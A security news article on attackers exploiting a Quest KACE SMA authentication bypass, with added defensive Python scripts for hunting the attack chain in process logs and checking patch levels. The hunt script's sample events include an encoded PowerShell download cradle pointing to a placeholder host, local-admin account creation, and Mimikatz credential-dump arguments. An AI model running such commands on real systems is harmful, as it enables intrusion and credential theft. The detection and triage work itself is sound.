Cybersecurity researchers have confirmed that threat actors are actively exploiting a severe authentication bypass vulnerability in unpatched Quest KACE Systems Management Appliance (SMA) devices, putting administrative accounts at risk.
The vulnerability, tracked as CVE-2025-32975 and rated with a CVSS score of 10.0, allows attackers to impersonate legitimate users without valid credentials. Exploiting this flaw could enable full administrative control over affected SMA systems. While Quest released patches in May 2025, many internet-exposed SMA instances remain vulnerable.
According to cybersecurity firm Arctic Wolf, suspicious activity began appearing in customer environments during the week of March 9, 2026. Observed actions suggest attackers are leveraging the flaw to execute remote commands, drop malicious Base64-encoded payloads from external servers, and gain persistent access.
The attack methodology includes:
- Creating additional administrative accounts via runkbot.exe, a background process of the SMA Agent.
- Registry modifications and PowerShell scripts for persistence or system configuration changes.
- Credential harvesting using tools such as Mimikatz.
- Discovery and reconnaissance by enumerating logged-in users and local administrators and running commands such as net time and net group.
- Accessing backup infrastructure (Veeam, Veritas) and domain controllers via Remote Desktop Protocol (RDP).
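The chain above maps cleanly onto process-creation telemetry: the SMA Agent's runkbot.exe spawning net.exe to add accounts, PowerShell launched with an encoded command that decodes to a download cradle, net time / net group reconnaissance, and Mimikatz-style arguments. The hunt below is an added example written for this article; it is not Arctic Wolf's or Quest's detection content. The event field names, the runkbot.exe install path and every sample event are constructed, and the encoded payload is built in the script so the sample stays readable.

```python
"""Hunt for the KACE SMA post-exploitation chain in Windows process-creation
telemetry (Sysmon Event ID 1 / Security 4688 exported as dicts). Added example
for this article; field names, paths and all sample events are constructed."""
import base64
import ntpath
import re

# Constructed sample events. 203.0.113.5 is an RFC 5737 documentation address,
# and the agent path is an assumed install location, not one quoted by Quest.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENC = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")
AGENT = r"C:\Program Files (x86)\Quest\KACE\runkbot.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": AGENT, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"host": "ws01", "parent": AGENT, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"host": "ws01", "parent": AGENT,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"host": "dc01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net time \\dc01"},
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\m.exe",
     "cmdline": 'm.exe "privilege::debug" "sekurlsa::logonpasswords"'},
    {"host": "ws02", "parent": AGENT, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i agent-update.msi /qn"},   # routine KACE deployment
]

ACCOUNT_ADD = re.compile(r"^net1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", re.I)
RECON = re.compile(r"^net1?(?:\.exe)?\s+(?:time|group|localgroup)\b(?!.*\s/add\b)", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_HINT = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|"
                         r"Invoke-Expression|FromBase64String|Net\.WebClient", re.I)
CRED_DUMP = re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if the
    command line carries no decodable payload."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Map each event to the TTPs in the article; one finding per rule hit."""
    findings = []
    for ev in events:
        cmd, image, parent = ev["cmdline"], basename(ev["image"]), basename(ev["parent"])
        hits = []
        # Account creation is only suspicious here when the SMA Agent is the parent.
        if parent == "runkbot.exe" and ACCOUNT_ADD.search(cmd):
            hits.append("account_creation_via_sma_agent")
        if image in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(cmd)
            if script and CRADLE_HINT.search(script):
                hits.append("encoded_download_cradle")
        if RECON.search(cmd):
            hits.append("domain_recon")
        if CRED_DUMP.search(cmd) or CRED_DUMP.search(image):
            hits.append("credential_dumping")
        findings.extend({"host": ev["host"], "rule": r, "cmdline": cmd} for r in hits)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['rule']:32} {f['cmdline'][:60]}")
```

The account-creation rule is keyed on the parent process on purpose: KACE legitimately runs scripts through the agent, so a bare net user /add is noisy, while an SMA-spawned net.exe adding a local administrator outside a change window is the signal the article describes. Correlate those hits with SMA script history before escalating.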
Arctic Wolf and other security experts warn that SMA systems exposed to the internet are particularly at risk. Administrators are urged to immediately apply the latest Quest patches:
- Version 13.0.385
- Version 13.1.81
- Version 13.2.183
- Version 14.0.341 (Patch 5)
- Version 14.1.101 (Patch 4)
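Because the fix lands on five separate branches, "am I patched" is a per-branch comparison, not a single version threshold. The triage script below is an added example for this article, not a Quest tool: it reads an inventory of appliance versions and reports which ones sit below the fixed build for their branch. The inventory is constructed, and the major.minor.build format is assumed from the version numbers quoted above; branches not in the list are flagged for manual review rather than guessed at.

```python
"""Triage an SMA inventory against the fixed releases listed above.
Added example for this article; the inventory is constructed and the
major.minor.build version format is assumed from the quoted versions."""
import re

# Branch (major, minor) -> first build carrying the fix, from the list above.
FIXED_BUILDS = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,   # Patch 5
    (14, 1): 101,   # Patch 4
}

VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, build) or None; trailing labels such as
    '(Patch 5)' are ignored."""
    m = VERSION_RE.match(text or "")
    return tuple(int(g) for g in m.groups()) if m else None


def assess(version_text):
    """Classify one appliance as patched, vulnerable, unknown_branch or
    unparseable. Assumes builds within a branch only increase, so anything at
    or above the fixed build counts as patched; branches outside the list
    (older or newer) are not judged here and need manual review."""
    parsed = parse_version(version_text)
    if parsed is None:
        return "unparseable"
    major, minor, build = parsed
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unknown_branch"
    return "patched" if build >= fixed else "vulnerable"


def triage(inventory):
    """{hostname: version string} -> {hostname: status}, hosts needing
    action first."""
    order = {"vulnerable": 0, "unknown_branch": 1, "unparseable": 2, "patched": 3}
    return dict(sorted(((h, assess(v)) for h, v in inventory.items()),
                       key=lambda hv: (order[hv[1]], hv[0])))


# Constructed inventory: hostnames and the non-fixed builds are made up.
INVENTORY = {
    "kace-sma-01": "14.0.341 (Patch 5)",
    "kace-sma-02": "14.0.330",
    "kace-sma-03": "13.2.180",
    "kace-sma-04": "14.1.101",
    "kace-lab": "12.1.50",
    "kace-old": "",
}

if __name__ == "__main__":
    for host, status in triage(INVENTORY).items():
        print(f"{host:12} {INVENTORY[host]:20} {status}")
```

Pull the version strings from the appliances themselves (or from the asset system that tracks them) rather than from change tickets, since the point of the check is to catch patches that were scheduled but never applied.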
Exposing SMA instances to the internet without proper mitigation significantly increases the likelihood of compromise.
This incident highlights the ongoing risks posed by unpatched enterprise management systems and the critical importance of timely vulnerability management. Organizations using Quest KACE SMA are strongly advised to validate patch deployment and review administrative account security to prevent unauthorized access.